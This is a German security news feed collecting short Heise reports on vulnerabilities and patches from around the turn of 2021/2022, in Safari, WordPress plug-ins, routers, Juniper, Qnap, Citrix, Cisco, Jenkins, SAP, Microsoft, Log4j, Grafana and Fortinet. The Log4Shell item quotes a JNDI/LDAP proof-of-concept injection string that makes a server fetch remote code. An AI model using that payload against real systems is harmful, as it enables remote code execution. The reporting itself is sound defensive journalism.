bedrohungsfeed

Bug in Apples Safari-Browser: Fremde Seiten können IndexedDB-Namen auslesen

Ein Anbieter von Fingerprinting-Werkzeugen für Betreiber von Webservern hat eine bislang nicht geschlossene Lücke in Apples Safari-Browser entdeckt. Der Bug steckt in Apples Implementierung der IndexedDB-API, mit der Seiten Datenbanken lokal abspeichern können. Offenbar ist es aktuell möglich, dass beliebige Server die bereits vorhandenen IndexedDBs, die in Safari abgelegt sind, zumindest dem Namen nach abzufragen. Dies wiederum erlaubt ein unerwünschtes Nutzertracking, da die Datenbanken auch Hinweise geben, wohin der Nutzer gesurft ist. Unter Umständen ergeben sich aber auch direktere Sicherheitsprobleme je nach Website – etwa jenen von Google. Laut einem Blogposting des Anbieters FingerprintJS betrifft das Problem nicht nur die macOS-Version von Safari, sondern die noch deutlich stärker verbreitete Variante unter iOS (inklusive iPadOS). Dort steckt WebKit, Apples Browser-Engine, in jedem Webwerkzeug, da eigene Engines von Apple nach wie vor verboten sind. Entsprechend könnte das IndexedDB-Problem auch in den Browsern anderer Hersteller wie Google (Chrome) oder Firefox stecken. Das Leaking der Namen können etwa Werbetreibende nutzen, um eine Surfhistorie des Nutzers anzulegen – oder Angreifer, die nähere Details über ihr Opfer erfahren wollen. Die Google-Tochter YouTube legt zudem eine IndexedDB an, deren Name die authentifizierte Google-User-ID enthält. Mit dieser lassen sich wiederum über die Google-API weitere Details zu einem Nutzer abfragen, inklusive eines womöglich hinterlegten Profilbilds. FignerprintJS zufolge steckt der Bug in Safari 15 für Mac sowie allen WebKit-Browsern unter iOS 15 und iPadOS 15 inklusive der jeweils aktuellen Versionen. Für das Leaking hat der Dienstleister auch eine Live-Demonstration bereitgestellt. Diese zeigte bei einem Versuch etwa an, dass man sich auf YouTube, Instagram oder Stitcher aufgehalten hatte. Ältere Browser wie Safari 14 scheinen nicht tangiert zu sein. Bislang scheint es für das Problem keinen Workaround zu geben. Auch die Verwendung des Privatsphärenmodus in Safari ändern nichts am Tracking. Apple kennt den Fehler bereits. Ein entsprechender Problembericht landete bereits Ende November im Bugtracker des WebKit-Projekts. Ob an einem Fix gearbeitet wird, ist unklar.

Quelle: Heise

Admin-Lücke in drei WordPress-Plug-ins geschlossen

Wer auf seiner WordPress-Website das Shop-System Woocommerce in Kombination mit den Plug-ins Login/Signup Popup, Side Cart Woocommerce (Ajax) oder Waitlist Woocommerce (Back in stock notifier) einsetzen, sollte die Software aus Sicherheitsgründen auf den aktuellen Stand bringen. Die Plug-ins sind einem Bericht der Sicherheitsforscher von Wordfence zufolgeauf 84.000 Seiten installiert. Alle drei Plug-ins sind über eine Sicherheitslücke (CVE-2022-0215 „hoch“) attackierbar. Die Verwundbarkeit steckt in der save-settings-Funktion via wp_ajax. Da hier nicht überprüft wird, wer Änderungen vornimmt, könnten Angreifer unrechtmäßig Einstellungen auf Websites vornehmen (CSFR-Attacke). Dafür müssen sie aber einen eingeloggten Admin etwa dazu bringen, auf einen Link zu klicken. Klappt das, könnte ein Angreifer unter anderem ein neues Admin-Konto anlegen und darüber die volle Kontrolle über eine Seite erlangen. Die folgenden Versionen sollten gegen solche Attacken gerüstet sein:

  • Login/Signup Popup 2.3
  • Side Cart Woocommerce (Ajax) 2.1
  • Waitlist Woocommerce ( Back in stock notifier ) 2.5.2

Quelle: Heise

Sicherheitslücke in Kernel-Treiber gefährdet diverse Router

Angreifer aus dem Internet könnten schädlichen Code in Router-Modellen mehrerer Hersteller einschleusen und ausführen. Abhilfe in Form aktualisierter Firmware steht für einige Geräte bereit. Auf betroffenen Routern könnten zudem manuell erstellte Firewall-Regeln vorläufig das Risiko senken. Derzeit sind noch keine aktiven Angriffe auf das Leck bekannt. Die Schwachstelle befindet sich in dem Kernel-Modul NetUSB des Herstellers KCodes (CVE-2021-45608). NetUSB dient dazu, direkt am Router angeschlossene USB-Geräte von Endgeräten im LAN aus zu nutzen. Dazu stellt es zusammen mit einem Treiber auf dem Endgerät eine USB-Verbindung via Netzwerk zum Gerät am Router her. Die Schwachstelle resultiert daraus, dass der Treiber eine vom Endgerät gesendete Größenangabe verwendet, ohne weitere Prüfungen vorzunehmen. Dadurch könnten Angreifer mit manipulierten Angaben einen Pufferüberlauf auslösen. Die Sicherheitsforscher von SentinalOne schreiben in ihrer Sicherheitsmeldung, dass das Ausnutzen der Lücke zwar nicht einfach, aber eben nicht unmöglich sei. Zudem lausche der Treiber auf der Adresse 0.0.0.0 und dem TCP-Port 20005. Da keine Firewall-Regeln, zumindest auf dem getesteten Netgear-Router, Zugriffe darauf einschränkten, war der Treiber aus dem Internet erreichbar. Als vorläufige Gegenmaßnahme, wenn kein Firmware-Update vom Hersteller verfügbar ist, hilft daher eine Firewall-Regel. Diese muss den Zugriff vom externen Interface auf den TCP-Port 20005 verweigern, um Angriffe aus dem Internet zu unterbinden. Das KCodes-NetUSB-Modul lizenzieren unter anderem die Hersteller DLink, EDiMAX, Netgear, Tenda, TP-Link und Western Digital, schreiben die IT-Sicherheitsforscher. Somit können Router dieser Hersteller von der Schwachstelle betroffen sein. Eine detaillierte Auflistung betroffener Geräte gibt es nicht. Bislang stehen für die Router D7800, R6400v2 und R6700v3 von Netgearaktualisierte Firmware-Images bereit, die Nutzer zeitnah installieren sollten. Eine Sicherheitsmeldung von Netgear will der Hersteller laufend aktualisieren und Updates für weitere Router darin ergänzen. Firmware-Aktualisierungen für betroffene Router von anderen Herstellern sind derzeit noch nicht bekannt.

Quelle: Heise

Juniper Networks stopft zahlreiche Sicherheitslücken

Juniper Networks, global einer der größten Netzwerkausstatter, hat Aktualisierungen bereitgestellt, um zahlreiche Sicherheitslücken in den Betriebssystemen der Geräte und in Netzwerkdiensten abzudichten. Insgesamt listet der Hersteller 34 Sicherheitsmeldungen zu den Schwachstellen auf. Die Sicherheitslücken reichen von Möglichkeiten, Skripte einzuschleusen und auszuführen, über die Ausweitung der Rechte angemeldeter Nutzer bis hin zu Denial-of-Service-Schwachstellen, durch die Angreifer die Geräte lahmlegen könnten. Teils hätten dies entfernte Angreifer aus dem Netz etwa mit manipulierten Paketen auslösen können, in anderen Fällen müssen Nutzer lokal angemeldet sein, um die Fehler zu provozieren. Weiterhin enthalten Cloud-Lösungen von Juniper offenbar Log4j und erben damit die Sicherheitslücken darin. Betroffen sind diverse Versionen der Betriebssysteme Junos OS, Junos OS Evolved oder etwa das Cloud-Netzwerk-System Contrail Networking. Zudem sind die Betriebssysteme teils nur auf einigen der Plattformen von den Sicherheitslücken betroffen. So hätten Angreifer sie teils nur auf Geräten der MX-oder SRX-Serie missbrauchen können, andere Schwachstellen hingegen etwa nur in der vMX- und MX150-Reihe. Dies ist nur ein Auszug, für andere Lücken sind weitere Modellreihen anfällig. Auf der Webseite mit den Sicherheitsmeldungen von Juniper finden Administratoren und IT-Verantwortliche die 34 Security Bulletins aus dem Januar 2022. Darin erläutert der Hersteller auch Details zu den Schwachstellen. Zudem nennt Juniper dort verwundbare Versionen und verlinkt die Download-Seite mit den Software-Flicken, die die Lücken stopfen.

Quelle: Heise

Schadcode-Schlupflöcher in Qnap NAS geschlossen

Wer einen Netzwerkspeicher (NAS) von Qnap besitzt, sollte das System in den Einstellungen und die installierte Anwendungen im App Center auf den aktuellen Stand bringen. Andernfalls könnte Malware auf Geräten landen. So könnten Angreifer beispielsweise an veralteten Versionen der Betriebssysteme QTS und QuTS Hero ansetzen, um Schadcode auszuführen. Die Versionen ab QTS 5.0.0.1891 build 20211221, QTS 4.5.4.1892 build 20211223 und QuTS hero h5.0.0.1892 build 20211222 sollen dagegen gewappnet sein, versichern die Entwickler in einem Beitrag. Über Schwachstellen in den Überwachungssystemen QVR Elite, QVR Pro and QVR Guard könnten Angreifer ebenfalls Schadcode auf Systeme schieben. Hier soll die Aktualisierung auf QVR Elite 2.1.4.0, QVR Pro 2.1.3.0 und QVR Guard 2.1.3.0Abhilfe schaffen. Die Kalender-Anwendung QcalAgent ist für XSS-Attacken anfällig. Das ist in der Version 1.1.7 repariert. Wie Angriffe funktionieren könnten, führt Qnap nicht aus. Das von den ersten beiden Lücken ausgehende Risiko stuft der Hersteller als „hoch“ ein.

Quelle: Heise

Citrix liefert Sicherheitsupdates für Workspace App und Hypervisor

Die Virtualisierungslösungen von Citrix enthielten Sicherheitslücken, die der Hersteller mit Aktualisierungen schließt. Betroffen sind die Workspace App for Linux sowie der Hypervisor selber. In der Workspace App for Linux hätten lokale Anwender ihre Zugriffsrechte durch Schwachstellen auf root ausweiten können (CVE-2022-21825). Betroffen sind die Versionen Workspace App for Linux 2012 bis 2111. Zudem muss die Komponente App Protection dafür installiert sein. Ob dies in der Standard-Installation der Fall ist, erwähnt Citrix in seinem Security Bulletin nicht; betroffen seien keine anderen Plattformen außer Linux. Das Risiko der Lücke schätzt der Hersteller jedoch als „hoch“ ein. Schwachstellen im Hypervisor, die Citrix in die Risikostufe „mittel“ einsortiert, könnten Angreifer mit privilegiertem Code in virtuellen Maschinen missbrauchen, um den Host abstürzen zu lassen oder so zu beeinflussen, dass er nicht mehr reagiert (CVE-2021-28704, CVE-2021-28705, CVE-2021-28714, CVE-2021-28715). Alle diese Lücken betreffen sämtliche derzeit unterstützten Hypervisor-Versionen, erläutert Citrix in seinem Advisory. Die Lücke, die die Rechteausweitung ermöglicht, dichtet die Workspace App for Linux 2112 und neuere Versionen ab, schreibt Citrix in seiner Mitteilung. Die Sicherheitslücken im Hypervisor schließen die Versionen Hypervisor 8.2 CU1 LTSR, Hypervisor 8.2 sowie XenServer 7.1 LTSR CU2. Die Downloads verlinkt Citrix in der Sicherheitsmeldung dazu. Administratoren und IT-Sicherheitsverantwortliche sollten die Aktualisierungen so schnell wie möglich installieren, rät Cisco im Fall der Workspace App for Linux. Den Hypervisor sollten sie hingegen aktualisieren, wie es ihr Patch-Zeitplan erlaubt.

Quelle: Heise

Sicherheitsupdates: Admin-Lücke bedroht Cisco Unified Contact Manager

Angreifer könnten Call-Center, die auf Cisco Unified Contact Center Management Portal (Unified CCMP) und Unified Contact Center Domain Manager (Unified CCDM) setzen, attackieren. Weiterhin gibt es noch Sicherheitsupdates für unter anderem Enterprise Chat und Prime Access Registrar Appliance.Die Lücke (CVE-2022-20658) in Unified CCMP und Unified CCDM ist als „kritisch“ eingestuft. In einer Warnmeldung führt Cisco mögliche Attacken aus: Verfügen Angreifer über erweiterte Benutzeranmeldeinformationen, könnten sie an der Schwachstelle im Web-basierten Management-Interface ansetzen. Da es keine serverseitige Validierung von Benutzerrechten gibt, kann eine präparierte HTTP-Anfrage Fehler auslösen. Klappt alles, sollen Angreifer Admin-Accounts anlegen und darüber unter anderem Telefon-Ressourcen modifizieren können. Dem Netzwerkausrüster zufolge ist die Version 12.6.1 davon nicht betroffen. Die Ausgaben 11.6.1 ES17, 12.0.1 ES5 und 12.5.1 ES5 sind gegen solche Attacken abgesichert. Die verbleibenden Lücken sind mit dem Bedrohungsgrad „mittel“ eingestuft. Nach erfolgreichen Attacken könnten Angreifer etwa XSS-Attacken auf Prime Infrastructure ausüben oder Informationen von Adaptive Security Device Manager leaken lassen.

Quelle: Heise

Viele Lücken im Software-System Jenkins entdeckt – und noch nicht geschlossen

Wer das Software-System Jenkins zur Entwicklung einsetzt, sollte die aktuelle Sicherheitswarnung der Entwickler genaustens studieren. Dort gibt es Informationen zu kürzlich entdeckten Sicherheitslücken und Patches. Einige Sicherheitsupdates lassen aber noch auf sich warten. Jenkins ist ein Automation-Server, mit dem man verschiedene Aufgaben beim Erstellen und Testen von Software automatisieren kann. Wie man dem Beitrag entnehmen kann, ist der Großteil der Lücken mit dem Bedrohungsgrad „mittel“ eingestuft. Die Schwachstellen betreffen Jenkins selbst, aber auch einige Plug-ins. Unter anderem eine Lücke (CVE-2022-20617) im Docker Commons Plug-in ist mit „hoch“ eingestuft. Hier könnten Angreifer mit bestimmten Rechten nach erfolgreichen Attacken eigene Kommandos ausführen. Die Version 1.18 ist gegen solche Angriffe abgesichert. Setzen Angreifer am Debian Package Builder Plug-in bis einschließlich Version 1.6.11 an, könnten sie ebenfalls eigene Befehle ausführen (CVE-2022-23118 „hoch“). Dafür gibt es bislang noch keinen Sicherheitspatch. Wann das so weit sein soll, ist derzeit unbekannt. Weitere Informationen zu den Lücken und Sicherheitsupdates kann man in der Warnmeldung nachlesen.

Quelle: Heise

Sicherheitsupdate: Schadcode-Lücke bedroht Computer mit HP-UX

Kommt HP-UX auf Systemen in Verbindung mit dem Netzwerkprotokoll Telnet für den Fernzugriff zum Einsatz, könnten Angreifer PCs mit Schadcode attackieren. Eine dagegen abgesicherte Version ist verfügbar. In einer Warnmeldung rät Hewlett Packard Enterprise (HPE) zu einem zügigen Update. Die Sicherheitslücke (CVE-2020-10188) ist als „kritisch“ eingestuft. HPE zufolge ist davon ausschließlich HP-UX 11.31 PHNE_42509 – telnetd Patch 11.32 betroffen. Um ein Sicherheitsupdate zu erhalten, müssen Admins den Support kontaktieren. Entfernte Angreifer sollen etwa über „kurze Schreibvorgänge“ am telntd-Dämon ansetzen können, um einen Speicherfehler auszulösen (buffer overflow). Wie so ein Angriff konkret aussieht, ist bislang nicht bekannt.

Quelle: Heise

IBM sichert sein Server- und Workstation-System AIX ab

Server- und Workstations mit IBMs Unix-Betriebssystem AIX sind verwundbar. Nach erfolgreichen Attacken könnten Angreifer eigenen Code auf Systemen ausführen. So etwas führt oft zu einer vollständigen Kompromittierung. In einer Warnmeldung stufen die Entwickler den Bedrohungsgrad der Sicherheitslücke (CVE-2021-38991) als „hoch“ ein. Konkret sind AIX 7.1, 7.2, 7.3 und VIOS 3.1 bedroht. In dem Beitrag listet IBM die abgesicherten AIX-/VIOS-Versionen auf. Dort finden Admins auch Hinweise zum Updateprozess. Für eine erfolgreiche Attacke müssen Angreifer der Meldung zufolge lokalen Zugriff auf verwundbare Systeme haben. Besondere Nutzerrechte sollen nicht vonnöten sein. Wie ein konkreter Angriff auf die verwundbare Komponente lscore command ablaufen könnte, ist bislang nicht bekannt. Mit beispielsweise lslpp -L | grep -i bos.rte.security können Admins prüfen, ob die Komponente installiert ist.

Quelle: Heise

Firefox, Thunderbird: Angreifer könnten Opfer im Vollbildmodus gefangen halten

Firefox, Firefox ESR und Thunderbird sind verwundbar, Angreifer könnten unter anderem den Vollbildmodus manipulieren oder sogar Schadcode auf Computern ausführen. In den Warnmeldungen hat Mozilla den Bedrohungsgrad der Sicherheitslücken in den Webbrowsern und dem Mailclient größtenteils als „hoch“ eingestuft. Nach erfolgreichen Attacken könnten Angreifer zum Beispiel Tabs dauerhaft im Vollbildmodus laufen lassen (CVE-2022-22743 „hoch“). Opfer sollen diesen Zustand nicht beenden können. Beim Einfügen von Text (CVE-2022-22742 „hoch“) kann es zu Speicherfehlern (out-of-bounds) kommen. So etwas ist in der Regel ein Einfallstor für Schadcode. Auch das Abspielen von Audio kann zu solchen Fehlern führen (CVE-2022-22737 „hoch“) .Die Entwickler geben an, die Sicherheitsprobleme in den Versionen Firefox 96, Firefox ESR 91.5 und Thunderbird 91.5 gelöst zu haben.

Quelle: Heise

Patchday: SAP schließt in mehreren Anwendungen Lücke mit Höchstwertung

SAP-Software hat ebenfalls mit der Log4j-Lücke zu kämpfen und hat nun seine Anwendungen dagegen gerüstet. Zum Patchday haben sich die Entwickler aber auch noch um weitere Schwachstellen gekümmert. In einer Warnmeldung können Admins die konkret von Log4j betroffenen Anwendungen einsehen. Darunter sind unter anderem Business One, Connected Health Platform 2.0 und NetWeaver. SAP stuft den Bedrohungsgrad mit dem höchstmöglichen CVSS Score 10 von 10 ein. Ansonsten hat der Softwareentwickler noch mehrere Schwachstellen in Create Single Payment Application (etwa CVE-2022-22531 „hoch„) geschlossen. In Business One haben sie mehrere Informationslecks abgedichtet. Zusätzlich hat SAP noch einige Warnmeldungen aus Dezember 2021 aktualisiert.

Quelle: Heise

Patchday: Sechs Windows-Lücken öffentlich bekannt, durch eine schlüpft Emotet

Am letzten Patchday in diesem Jahr hat Microsoft Sicherheitsupdates für 67 Lücken veröffentlicht. Davon sind sieben als „kritisch“ eingestuft. Eine Schwachstelle in Windows nutzen Angreifer derzeit aktiv aus. Fünf weitere Lücken sind öffentlich bekannt und es könnten Angriffe bevorstehen. Wie aus Microsofts Sicherheitscenter hervorgeht, sind diese Schwachstellen größtenteils mit dem Bedrohungsgrad „hoch“ eingestuft. Einen Fehler (CVE-2021-43890) im Windows AppX Installer nutzen derzeit Microsoft zufolge die Drahtzieher der aktuellen Emotet-Kampagne aus, um Malware auf Systeme zu schieben. Damit eine Attacke klappt, müssen Angreifer Opfer dazu bringen, einen präparierten Dateianhang zu öffnen. Würden Angreifer erfolgreich an den weiteren öffentlich bekannten Lücken ansetzen, könnten sie sich höhere Nutzerrechte verschaffen, um Computer zu kompromittieren. Die kritischen Schwachstellen betreffen unter anderem iSNS Server (CVE-2021-43215), Microsoft Defender (CVE-2021-42310) und Office (CVE-2021-43905). In allen Fällen könnten Angreifer ohne Authentifizierung aus der Ferne Schadcode auf Systemen ausführen. Dafür müssen Angreifer in einigen Fällen lediglich spezielle vorbereitete Pakete an verwundbare Systeme schicken. Außerdem schließt Microsoft 15 Schadcode-Lücken im auf Chromium basierenden Edge Browser. Die verbleibenden Sicherheitslücken in unter anderem DirectX, HyperV und SharePoint sind größtenteils mit dem Bedrohungsgrad „hoch“ versehen. Nach erfolgreichen Attacken könnten Angreifer beispielsweise VMs über DoS-Attacken abschießen oder auf eigentlich abgeschottete Informationen zugreifen. Die Installation der Office- und Windows-Sicherheitspatches passiert in der Standardeinstellung vom Betriebssystem automatisch über Windows Update.

Quelle: Heise

Patchday: Kritische Sicherheitslücken in SAP-Geschäftssoftware

SAP hat Sicherheitsupdates zum Schließen von 15 Sicherheitslücken freigegeben. Fünf davon weist das Unternehmen als aktualisierte Meldungen respektive Flicken aus den Vormonaten aus, zehn hingegen sind neu. Die Schwachstellen erlaubten Angreifern unter anderem Schadcode einzuschleusen und auszuführen, SQL-Befehle via SQL-Injection zu injizieren und Cross-Site-Scripting- oder Denial-of-Service-Angriffe auszuführen. SAP-Administratoren sollten aufgrund der Risikoeinstufung der Lücken zeitnah aktiv werden und ihre Systeme auf den aktuellen Stand bringen. Die kritischen Lücken finden sich im ausgelieferten Google Chrome vom SAP Business Client 6.5 (CVSS 10), in SAP Commerce in der chinesisch lokalisierten Fassung, SAP ABAP Server & ABAP Platform (Translation Tools) und SAP NZDT Mapping Table Framework (alle drei CVSS 9.9). Schwachstellen mit hohem Risiko betreffen SAP Commerce (CVSS 8.8 sowie 7.5), SAP Knowledge Warehouse (CVSS 8.8), SAP NetWeaver AS ABAP (CVSS 8.4), SAP SuccessFactors Mobile Application für Android (CVSS 7.8) und SAF-T Framework (7.7). Weitere vier Schwachstellen stuft SAP als mittleres sowie eine als niedriges Risiko ein. Das Walldorfer Unternehmen hält sich wie gewohnt mit weitergehenden Details zu den Sicherheitslücken zurück. Die Übersichtsseite zum SAP-Dezember-Patchday listet die einzelnen Sicherheitsmeldungen auf, die jedoch nur angemeldeten Nutzern zugänglich sind. Einzelne CVE-Einträge weisen etwa bei der chinesisch lokalisierten SAP Commerce-Version auf die Serialisierungs-Bibliothek Xstream als Ursache für die kritische Sicherheitslücke. Viele CVEs sind jedoch noch reserviert und enthalten keine öffentlich zugänglichen Informationen.

Quelle: Heise

Kritische Zero-Day-Lücke in Log4j gefährdet zahlreiche Server und Apps

Über eine kritische Zero-Day-Sicherheitslücke namens Log4Shell in der weitverbreiteten Java-Logging-Bibliothek Log4j können Angreifer beliebigen Code ausführen lassen. Betroffen sind etwa Dienste von Apple, Twitter, Steam, Amazon und vermutlich sehr viele kleinere Angebote. Es gibt Proof-of-Concept-Code, der das Ausnutzen der Lücke demonstriert und auch bereits erste Angriffe. Seit Kurzem steht ein Quellcode-Update des Apache-Projekts bereit; Admins sollten dringend aktiv werden. Ein Angreifer kann die Sicherheitslücke ausnutzen, indem er manipulierte Anfragen an einen verwundbaren Server oder eine angreifbare Anwendung schickt. Der Proof-of-Concept-Code (PoC) der Pen-Testing-Gruppe 0x0021h zeigt, dass der Angreifer eine Zeichenkette der Form ${jndi:ldap://127.0.0.1:1389/a} ins Protokoll schreibt. Der Verzeichnisdienst JNDI kontaktiert den genannten LDAP-Server 127.0.0.1:1389 und nimmt schließlich von ihm Daten wie potenziell bösartige Java-Klassen entgegen und führt diese aus. Ein Angreifer müsste demnach einen von ihm kontrollierten Server angeben, um einen Server über das Logging zu kapern (Log4Shell). Die Zero-Day-Lücke Log4Shell hat bereits eine CVE-Nummer erhalten (CVE-2021-44228, Risiko kritisch, CVSSv3 10/10). Sie reißt in zahlreiche Dienste und Anwendungen Sicherheitslücken, die die Log4j-Bibliothek einsetzen. Die Pen-Testing-Gruppe 0x0021h schreibt zu ihrem PoC-Exploit, dass er für Apache Struts2, Apache Solr, Apache Druid, Apache Flink und weitere funktioniere. Ein weiterer Nutzer sammelt in einem github-Projekt verwundbare Dienste und Programme mit Screenshots als Beleg. Darunter sind viele namhafte wie Amazon, Apple iCloud, Cloudflare, Steam oder Twitter. Bei den Anwendungen tauchen unter anderem die von 0x0021h genannten sowie etwa das populäre Minecraft auf. Diverse Sicherheitsforscher berichten über Scans, die nach verwundbaren Diensten suchen und unter anderem das CERT der Deutschen Telekom beobachtet auch bereits erste Angriffe. Betroffen von der Sicherheitslücke ist Log4j von Version 2.0-beta9 bis 2.14.1. Das Apache-Projekt hat kurzfristig Version 2.15.0 veröffentlicht, die die Lücke schließt. In einer Sicherheitsmeldung listen die Apache-Entwickler zudem Maßnahmen auf, wie man die Server ohne Update vorläufig sichern kann. Bei Log4j ab Version 2.10 helfe das Setzen der Systemeigenschaft „log4j2.formatMsgNoLookups“ auf “true” oder das Entfernen der JndiLookup-Klasse aus dem Klassenpfad (etwa mit dem Befehl zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Zudem würde Java 8u121 das Ausführen eingschleusten Codes unterbinden, sodass eine Aktualisierung der Java-Umgebung helfen könnte. In Kürze sollten Linux-Distributionen und Apache-basierte Projekte daher aktualisierte Pakete ausliefern, die Administratoren so rasch wie möglich installieren sollten. Die Lücke erinnert an ShellShock: Damals waren viele Server durch eine Sicherheitslücke im Kommandozeileninterpreter Bash kompromittierbar. Einzelne Stimmen hatten darin sogar Wurm-Potenzial ausgemacht, also dass Schadcode automatisch von Server zu Server „kriechen“ könnte.

Quelle: Heise

IBM sichert Datenbanksystem Db2 und weitere Software ab

IBM hat wichtige Sicherheitsupdates für App Connect Enterprise, Cloud Object Storage Systems, Db2, PowerVM Hypervisor, Spectrum Control und WebSphere veröffentlicht. Sind Attacken erfolgreich, könnten Angreifer Systeme lahmlegen (DoS) oder sogar Schadcode ausführen. Admins sollten die unterhalb dieser Meldung verlinkten Warnmeldungen studieren. Dort finden sie Informationen zu bedrohten und gegen Attacken abgesicherte Software-Versionen. Am gefährlichsten gilt eine „kritisch“ eingestufte Lücke (CVE-2021-23358) in Node.js. Davon ist IBM App Connect Enterprise betroffen. Aufgrund eines Fehlers in einer Template-Funktion könnte ein entfernter Angreifer präparierte Anfragen verschicken und im Anschluss eigenen Code ausführen. Eine mit der Gefahreneinstufung „hoch“ versehene Schwachstelle betrifft PowerVm Hypervisor. Hier könnte ein Angreifer den Speicher von Host-Systemen manipulieren. Durch das Versenden von einem präparierten Zip-Archiv könnten Angreifer IBM Spectrum Control und WebSphere abstürzen lassen. Da IBM Db2 in einigen Fällen eine schwächere Verschlüsselung als gedacht einsetzt (CVE-2021-39002 „mittel“), könnten Angreifer unter Umständen Informationen entschlüsseln.

Quelle: Heise

Qnap schließt Sicherheitslücken in NAS-Zusatzsoftware

Für Qnap NAS-Systeme bietet der Hersteller Erweiterungen in Form von Zusatzsoftware an. In einigen Zusatzpaketen haben Sicherheitslücken die Integrität der Netzwerk-Speichersysteme mit teils hohem Risiko gefährdet. Der Hersteller stellt jetzt Aktualisierungen bereit, die die Sicherheitslecks abdichten. Aufgrund einer Schwachstelle in der Zusatzsoftware Surveillance Station könnten Angreifer beliebigen Code auf Qnap NAS einschleusen und ausführen. Ein Stack-basierter Pufferüberlauf könne in der Software auftreten. Neue Versionen von Surveillance Station schließen die Lücke, sie sind ab 5.2.0.4.2, 5.2.0.3.2, 5.1.5.4.6sowie 5.1.5.3.6 nicht mehr enthalten (CVE-2021-38687, Risiko hoch). Eine weitere Schwachstelle hat das Unternehmen in der Qnap-NAS-Software Kazoo Server mit Version 4.11.20 geschlossen. War der UPnP-Medien-Server Kazoo Server aktiv, hätten Angreifer bösartigen Code via Cross-Site-Scripting einschleusen können (CVE-2021-38680, mittel). Zudem gab es eine Aktualisierung für die Android-App Qfile zum Browsen des NAS via Smartphone. In Version 3.0.0.1105 der App ist es Angreifern nicht mehr möglich, diese aufgrund einer unsachgemäßen Authentifizierung zu komprimittieren und an sensible Informationen zu gelangen (CVE-2021-38688, mittel). Qnap hat dazu drei Sicherheitsmeldungen herausgegeben:

  • QSA-21-46: „Stack Buffer Overflow Vulnerability in Surveillance Station“
  • QSA-21-54: „Reflected XSS Vulnerability in Kazoo Server“
  • QSA-21-55: „Improper Authentication Vulnerability in Qfile“

Qnap-Administratoren, die diese Software einsetzen, sollten die bereitgestellten Aktualisierungen zeitnah einspielen.

Quelle: Heise

Sicherheitsupdate: Grafana dichtet Schwachstelle ab

Die Entwickler von Grafana haben mit neuen Versionen eine kürzlich entdeckte Sicherheitslücke geschlossen. Bei der Software handelt es sich um eine populäre Lösung zur Datenvisualisierung und für Monitoring. Durch eine sogenannte Directory-Traversal-Lücke darin hätten Angreifer auf lokale Dateien zugreifen können (CVE-2021-43798, Risikoeinstufung hoch). Das Grafana-Projekt nennt den verwundbaren Pfad <grafana_host_url>/public/plugins/<“plugin-id”> und daraus abgeleitete Beispiele. Die plugin-id kann etwa „mysql“, „logs“ oder ähnlich lauten, entsprechend der Namen der installierten Plug-ins. Auf derartige Verzeichnisse ließ sich durch die Lücke zugreifen. Betroffen sind die Grafana-Versionen 8.0.0 Beta 1 bis einschließlich 8.3.0. Die Schwachstellen werden von Grafana 8.3.1, 8.2.7, 8.1.8 und 8.0.7 geschlossen. Nutzer der Software sollten sie unbedingt zeitnah auf den neuen Stand bringen, empfehlen die Entwickler. Auf github listet das Grafana-Projekt die aktuellen Downloads auf und erläutert die Schwachstelle knapp.

Quelle: Heise

FortiOS- und FortiProxy-Updates schließen Sicherheitslücken, Check empfohlen

Neue Softwarestände für FortiOS und FortiProxy dichten Schwachstellen ab, durch die Angreifer Schadcode einschleusen, Ihre Rechte ausweiten oder an sensible Informationen gelangen könnten. Eine der Lücken hat zwar ein zunächst niedrig eingeschätztes Risiko, wurde jedoch in der Praxis zum Einschleusen von Schadcode missbraucht, weshalb der Hersteller empfiehlt, die Geräte auf Spuren potenzieller Einbrüche zu untersuchen. Fortinet meldet insgesamt acht Sicherheitslücken:

  • Einen Integer-Überlauf in der Speicherverwaltung des SSL-VPN hätten Angreifer missbrauchen können, um mit manipulierten Anfragen Daten auf dem Heap zu verwürfeln und so möglicherweise beliebigen Code auszuführen (CVE-2021-26109, Risikokategorie nach CVSS hoch).
  • Durch fest einprogrammierte SSL-VPN Cookie-Verschlüsselungs-Keys hätten Angreifer diese aus der Firmware extrahieren können, wodurch sie unbefugt an Informationen gelangen könnten (CVE-2021-26108, hoch).
  • Angemeldete Nutzer hätten ihre Rechte etwa durch manipulierte Automatisierungs-Skripte im autod-Daemon von FortiOS und FortiProxy zum Super-Admin ausweiten können (CVE-2021-26110, hoch).
  • Durch eine sogenannte Path-Traversal-Schwachstelle in FortiOS und FortiProxy hätten unangemeldete Nutzer durch eingeschmuggelte Pfad-Zeichenketten in einen GET-Request an die Login-Seite sensible Informationen auslesen und so ihre Rechte ausweiten können (CVE-2021-41024, hoch).
  • Durch einen Heap-basierten Pufferüberlauf bei der Signaturprüfung von Firmware-Images hätten Angreifer mittels präparierter Firmware-Abbilder beliebigen Code einschleusen können (CVE-2021-36173, hoch).
  • Das SSL-VPN-Portal von FortiOS und FortiProxy war anfällig für Cross-Site-Request-Forgery (CSRF), wodurch Angreifer Zugriffskontrollen umgehen könnten (CVE-2021-26103, mittel).
  • Ein Pufferüberlauf in der TFTP-Client-Bibliothek hätte angemeldeten Nutzern an der Kommandozeile ermöglicht, beliebigen Code auszuführen (CVE-2021-42757, mittel).
  • Das Skript „restore src-vis“ konnte Code ohne Integritätsprüfung herunterladen. Lokal angemeldete Nutzer können so mit manipulierten Update-Paketen beliebigen Code auf die Maschinen holen. (CVE-2021-44168, niedrig).

Gerade bei der letztgenannten Sicherheitslücke scheint das praktische Risiko jedoch von der CVSS-Einstufung abzuweichen, da das Unternehmen ein darüber kompromittiertes Gerät aufgespürt hat. Die Sicherheitsmeldung von Fortinetbeschreibt, wie Administratoren von Lösungen des Herstellers überprüfen können, ob bei ihnen ein Einbruch stattgefunden und sich ein Angreifer ungebeten eingenistet hat. Es sind diverse FortiOS- (5er- bis 7er-Versionszweige) und FortiProxy-Versionen (1er-, 2er- und 7er-Versionen) jeweils teilweise von den Schwachstellen betroffen. Administratoren von Fortinet-Systemen sollten daher über die ihnen bekannten Wege die Aktualisierung auf den neuen, ausgebesserten Software-Stand anstoßen und die empfohlene Prüfung auf ungebetene Gäste vornehmen.

Quelle: Heise

LibreOffice zieht Update wegen kritischer Schwachstelle vor

